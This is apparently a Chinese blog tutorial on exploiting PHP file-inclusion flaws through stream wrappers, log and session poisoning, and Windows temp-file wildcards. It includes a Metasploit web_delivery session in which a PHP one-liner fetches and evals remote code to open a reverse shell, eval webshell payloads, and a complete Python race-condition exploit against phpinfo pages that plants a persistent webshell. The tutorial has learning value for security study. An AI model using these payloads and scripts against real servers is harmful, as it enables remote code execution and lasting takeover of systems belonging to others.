文章目录
php伪协议
file://
file://
用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen
与allow_url_include
的影响
属性 | 支持 |
---|---|
受allow_url_fopen影响 | No |
允许读取 | Yes |
允许写入 | Yes |
允许添加 | Yes |
允许同时读与写 | Yes |
支持start() | Yes |
支持 unlink() | Yes |
支持rename() | Yes |
支持mkdir() | Yes |
支持rmdir() | Yes |
- 用法:
file://[文件的路径和文件名]
,下列图片中的web.php代码为:<?php include($_GET['file']); ?>
php://
- php:// 访问各个输入/输出流(I/O streams),在CTF中经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。
- 不需要开启allow_url_fopen,仅php://input、 php://stdin、 php://memory 和 php://temp 需要开启allow_url_include。
php://filter
- php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 简单通俗的说,这是一个中间件,在读入或写入数据的时候对数据进行处理后输出的一个过程。php://filter在
allow_url_fopen
和allow_url_include
双off的情况下也可以正常使用
php://filter 参数 | |
---|---|
resource = <要过滤的数据流> | 这个参数是必须的,指定了你要筛选过滤的数据流 |
read = <读链的筛选链表> | 这个参数可选,可以设定一个或多个过滤器的名称,以管道符/ 分割 |
write = <写链的筛选列表> | 这个参数可选,可以设定一个或多个过滤器的名称,以管道符/ 分割 |
<; 两个链的筛选列表> | 任何没有以read = 或 write 作前缀的筛选器列表会视情况应用于读或写链 |
- 常用:
php://filter/read=convert.base64-encode/resource=file_name
将file_name的内容以base64编码的结果显示,php源代码必须进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。
php://input
php://input
可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行。必须开启allow_url_include
php://input
获取数据流不支持 enctype=“multipart/form-data” 参数,因为 php会试图解析所收到的数据,能解析就放入 $_POST, $_GET 数组里,不能解析,才会放到 php://input 里。
zip://,bzip2://,zlib://
- zip://, bzip2://, zlib:// 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名。zip://, bzip2://, zlib://协议在双off的情况下也可以正常使用;
- 使用方法:
zip:// [压缩文件绝对路径]#[压缩文件内的子文件名]
- 先将要执行的PHP代码写好文件名为
phpinfo.php
,将phpinfo.php
进行zip压缩,压缩文件名为phpinfo.zip,由于#在get请求中会将后面的参数忽略所以使用get请求时候应进行url编码为%23,且此处经过测试相对路径是不可行,所以只能用绝对路径。
- 如果可以上传zip文件便直接上传,若不能便将file.zip重命名为file.jpg后在上传,其他几种压缩格式也可以这样操作。
bzip2://
:使用方法:compress.bzip2://file.bz2
,bzip2不需指定压缩子文件,但测试发现bzip无法达到实现的结果哦
zlib://
:使用方法:compress.zlib://file.gz
data://
-
data://
协议需要满足双on条件,allow_url_fopen :on
、allow_url_include:on
-
使用方法:
data://text/plain,代码
,可执行代码
-
也可以通过
data://text/plain;bas464, base64编码的数据
,将php代码进行base64编码,然后由data://进行解码执行
总结
apache日志包含
- 如果我们使用这样一个URL
http://ip:port/<?php phpinfo();?>
访问服务器,那么在服务器的apache日志中就会产生相应的访问记录,如果该服务器上有一个文件包含漏洞,而且我们还知道apache日志文件的路径,那我们就可以对包含日志文件 - apache日志文件格式如下:可以看到其中有访问路径的记录,放我们访问
http://ip/<?php phpinfo();?>
- 页面报错,不过没关系,看一下日志
- 可以看到我们的访问记录,因为浏览器会对特殊字符进行编码,所以日志中包含编码后的结果,截取数据包进行更改
- 使用burp修改数据包,查看日志文件,成功包含恶意代码
- 在该服务器下有一个
web.php
充当文件包含漏洞,日志文件默认为在/var/log/html/access_log
,日志文件包含成功
- 如果目标服务器上有文件包含漏洞且可以猜到日志文件的路径,就可以使用该方法,但如果目标日志文件太大或没有读权限就会包含失败
session文件包含
-
当我们开启session后,就会将用户的一些信息存储到一个session文件中,并将文件名作为cookie发送给客户端,作为用户,用户信息肯定是可控的,如果我们在用户信息中植入恶意代码,然后包含session文件,就可以拿下服务器
-
要包含session文件,首先由一个文件包含漏洞,这里依然使用web.php,然后还要猜到session文件的路径,centos8的session文件默认在/var/lib/php/session下,存放用户信息的session文件名组成为
sess
+cookie
-
创建session.php编写如下代码,get传参登录,然后将用户名保存到session文件
<?php
session_start();
if(isset($_GET['name'])){
$_SESSION['name'] = $_GET['name'];
echo 'hello' . $_SESSION['name'];
}else if(isset($_SESSION['name'])){
echo 'hello' . $SESSION['name'];
}else{
echo 'please login';
}
- 访问session.php,可以看到服务端传来的cookie,由于我还没登录,session文件中还没有参数
- 传入
?name=<?php phpinfo();?>
,查看session文件
- session文件的内容如下,可以看到已经由我们的恶意代码了
- 在web.php中包含该session文件,包含成功
windows上传文件精准包含
- 前端主要代码如下:
<form acion=windows.php mothod='post' enctype="multipart/form-data">
<input type='file' name='file'>
<input type='submit' name='submit'>
</form>
- 后端代码如下:
include $_REQUEST['file'];
- 在后端添加一些代码测试,查看
$_FILES
和$_REQUEST['file']
<?php
var_dump($_FILES);
echo '<br>';
echo $_REQUEST['file'];
exit;
include $_REQUEST['file'];
?>
- 上传文件,可以看到页面只显示了
$_FILES
,说明没有接收到$_REQUEST['file']
,我们如何才能执行我们上传的恶意代码
$_FILES
显示了上传文件的临时文件地址,我们都知道,上传文件的都会先存放在临时文件目录下,但程序结束后就会删除临时文件,如果我们可以传入file等于临时文件名,那就可以在程序运行时执行恶意代码了,这样首先得知道临时文件名才行,从上图中可以看出,临时文件名为phpxxxx.tmp
的形式,而且xxxx为数字和字母的组合,猜或者爆破感觉都不太麻烦- 我们先了解一下:PHP在读取Windows文件时,会使用到FindFirstFileExW这个Win32 API来查找文件,而这个API是支持使用通配符的:
DOS_STAR:即 <,匹配0个以上的字符
DOS_QM:即>,匹配1个字符
DOS_DOT:即",匹配点号
- 简单来说,<会匹配字符,我们已知他会生成php+后面几个字符,我们可以通过通配符来进行匹配最后直接命令执行。我们只要传入值为
php<<<.tmp
就可以匹配到临时文件,然后执行 - 进行测试,由于form为post传参,所以使用burp截取添加参数
multipart/form-data
主要用于文件上传。这个类型上传大文件时,会将文件分成多块传送,每一块的 HTTP 头信息都有
Content-Disposition属性,值为
form-data,以及一个
name属性,值为控件名。 浏览器将表单发成多个数据块。最上面使用
Content-Type字段告诉服务器,数据格式是
multipart/form-data(即多个数据块),每个数据块的分隔标志是
–AaB03x。每个数据块的第一行是
Content-Disposition,其中的
name`字段表示这个数据块的控件名,数据体则是该控件的数据值,
SSH登录日志包含
- 和apache日志包含类似,在我们使用ssh登录服务器时,服务器会记录我们的连接记录,在Linux下,记录存储在
/var/log/secure
,var/log/secure 一般用来记录安全相关的信息,记录最多的是哪些用户登录服务器的相关日志。
- 日志中的用户名是我们可以控制的,如果登录一个
<?php system($_GET['cmd']);?>
这样的用户,然后利用文件包含漏洞执行日志文件,就可以拿下该服务器了,开始测试 - 由于用户名比较特殊,使用
ssh <?php ...?>@ip
的命令会报错,所以使用远程连接工具进行连接,
- 还是利用之前的web.php文件进行包含,可以看到包含成功
- 将shell传递给msf
┌──(root㉿kali)-[~/.ssh]
└─# msfconsole 进入msf
msf6 > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set target 1 # 选择php
target => 1
msf6 exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set lhost 192.168.204.128 # 本地IP
lhost => 192.168.204.128
msf6 exploit(multi/script/web_delivery) > set srvport 8081 # 设置本地端口
srvport => 8081
msf6 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.204.128:4444
[*] Using URL: http://192.168.204.128:8081/IufB5LP
[*] Server started.
[*] Run the following command on the target machine: # 将下列命令放到目标url的cmd中执行
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.204.128:8081/IufB5LP', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
- 执行后就可以看到建立连接
msf6 exploit(multi/script/web_delivery) >
[*] 192.168.204.3 web_delivery - Delivering Payload (1116 bytes)
[*] Sending stage (39860 bytes) to 192.168.204.3
[*] Meterpreter session 1 opened (192.168.204.128:4444 -> 192.168.204.3:59354 ) at 2022-08-18 11:11:25 -0400
- 进入交互模式,就可以执行命令了
msf6 exploit(multi/script/web_delivery) > show sessions # 查看连接
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter php/lin apache @ server 192.168.204.128:4444 -> 1
ux 92.168.204.3:59354 (192.
168.204.3)
msf6 exploit(multi/script/web_delivery) > sessions 1 # 选择连接
[*] Starting interaction with 1...
meterpreter > ls # 执行命令
Listing: /var/www/html
======================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 11 fil 2022-08-17 22:14:34 -0400 index.html
100644/rw-r--r-- 222 fil 2022-08-18 08:55:50 -0400 session.php
100644/rw-r--r-- 33 fil 2022-08-18 04:33:13 -0400 web.php
临时文件包含
phpinfo+LF
- phpinfo会打印上传缓存文件路径,如果目标网站有phpinfo的页面,我们可以向该页面POST一个文件,在phpinfo页面中抓取缓存文件路径,在利用时间竞争,就可以执行我们的恶意代码
# phpinfo.php
<?php
phpinfo();
?>
- 先测试一下phpinfo页面是否会打印我们的缓存文件内路径,python脚本如下:
import requests
from io import BytesIO
files = {
'file': BytesIO("<?php echo 'successful!!!';")
}
url = "http://ip/phpinfo.php"
r = requests.post(url=url, files=files, allow_redirects=False)
print r.content
-
可以看到回显中有如下内容:
-
我们只要利用这一特性,利用正则匹配,提取临时文件名
data = re.search(r"(?<=tmp_name] => ).*", r.content).group(0)
- 接下来就是如何在临时文件消失前包含它,我们需要知道临时文件在phpinfo页面加载完毕后才会被删除,phpinfo页面会将所有数据都打印出来,包括header,php默认的输出缓冲区大小为4096,可以理解为php每次返回4096个字节给socket连接
- 那么我们的竞争流程可以总结为:发送包含webshell的数据包给phpinfo页面,同时在header中塞满数据,垃圾数据会加大phpinfo加载时间,直接操作原生socket,每次读取4096个字节。只要读取到的字符里包含临时文件名,就立即发送第二个数据包。此时,第一个数据包的socket连接实际上还没结束,因为php还在继续每次输出4096个字节,所以临时文件此时还没有删除。利用这个时间差,在第二个数据包进行文件包含漏洞的利用,即可成功包含临时文件,最终getshell。
- 我们选择包含后写入文件的shell:
<?php file_put_contents('E:\phpstudy_pro\WWW\secu23day\shell', '<?php @eval($_REQUEST['a']);?>');?>
-
这样一旦包含成功,该shell就会在目录下永久留下一句话木马文件shell.php,下次直接利用即可。
-
python脚本如下:python2运行,此脚本中要求代码细节我也不清楚,就不多说了
import sys
import threading
import socket
import time
def setup(host, port):
TAG = "Security Test"
PAYLOAD = """%s\r
<?php fputs(fopen('E:\phpstudy_pro\WWW\secu23day\shell','w'),'<?php @eval($_POST[a]);')?>\r""" % TAG
REQ1_DATA = """-----------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
%s
-----------------------------7dbff1ded0714--\r""" % PAYLOAD
padding = "A" * 5000
REQ1 = """POST /secu23day/phpinfo.php?a=""" + padding + """ HTTP/1.1\r
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie=""" + padding + """\r
HTTP_ACCEPT: """ + padding + """\r
HTTP_USER_AGENT: """ + padding + """\r
HTTP_ACCEPT_LANGUAGE: """ + padding + """\r
HTTP_PRAGMA: """ + padding + """\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: %s\r
\r
%s""" % (len(REQ1_DATA), host, REQ1_DATA)
# modify this to suit the LFI script
LFIREQ = """GET /secu23day/first.php?file=%s HTTP/1.1\r
User-Agent: Mozilla/4.0\r
Proxy-Connection: Keep-Alive\r
Host: %s\r
\r
\r
"""
return (REQ1, TAG, LFIREQ)
def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s2.connect((host, port))
s.send(phpinforeq)
d = ""
while len(d) < offset:
d += s.recv(offset)
try:
i = d.index("[tmp_name] => ")
fn = d[i + 17:i + 44]
except ValueError:
return None
s2.send(lfireq % (fn, host))
d = s2.recv(4096)
s.close()
s2.close()
if d.find(tag) != -1:
return fn
counter = 0
class ThreadWorker(threading.Thread):
def __init__(self, e, l, m, *args):
threading.Thread.__init__(self)
self.event = e
self.lock = l
self.maxattempts = m
self.args = args
def run(self):
global counter
while not self.event.is_set():
with self.lock:
if counter >= self.maxattempts:
return
counter += 1
try:
x = phpInfoLFI(*self.args)
if self.event.is_set():
break
if x:
print "\nGot it! Shell created success"
self.event.set()
except socket.error:
return
def getOffset(host, port, phpinforeq):
"""Gets offset of tmp_name in the php output"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(phpinforeq)
d = ""
while True:
i = s.recv(4096)
d += i
if i == "":
break
# detect the final chunk
if i.endswith("0\r\n\r\n"):
break
s.close()
i = d.find("[tmp_name] => ")
if i == -1:
raise ValueError("No php tmp_name in phpinfo output")
print "found %s at %i" % (d[i:i + 10], i)
# padded up a bit
return i + 256
def main():
print "LFI With PHPInfo()"
print "-=" * 30
if len(sys.argv) < 2:
print "Usage: %s host [port] [threads]" % sys.argv[0]
sys.exit(1)
try:
host = socket.gethostbyname(sys.argv[1])
except socket.error, e:
print "Error with hostname %s: %s" % (sys.argv[1], e)
sys.exit(1)
port = 80
try:
port = int(sys.argv[2])
except IndexError:
pass
except ValueError, e:
print "Error with port %d: %s" % (sys.argv[2], e)
sys.exit(1)
poolsz = 10
try:
poolsz = int(sys.argv[3])
except IndexError:
pass
except ValueError, e:
print "Error with poolsz %d: %s" % (sys.argv[3], e)
sys.exit(1)
print "Getting initial offset...",
reqphp, tag, reqlfi = setup(host, port)
offset = getOffset(host, port, reqphp)
sys.stdout.flush()
maxattempts = 1000
e = threading.Event()
l = threading.Lock()
print "Spawning worker pool (%d)..." % poolsz
sys.stdout.flush()
tp = []
for i in range(0, poolsz):
tp.append(ThreadWorker(e, l, maxattempts, host, port, reqphp, offset, reqlfi, tag))
for t in tp:
t.start()
try:
while not e.wait(1):
if e.is_set():
break
with l:
sys.stdout.write("\r% 4d / % 4d" % (counter, maxattempts))
sys.stdout.flush()
if counter >= maxattempts:
break
print
if e.is_set():
print "Woot! \m/"
else:
print ":("
except KeyboardInterrupt:
print "\nTelling threads to shutdown..."
e.set()
print "Shuttin' down..."
for t in tp:
t.join()
if __name__ == "__main__":
main()
- 设置参数,运行脚本,使用该脚本前,修改php的
upload_tmp_dir
为C:\Windows\Temp
- 轻松getshell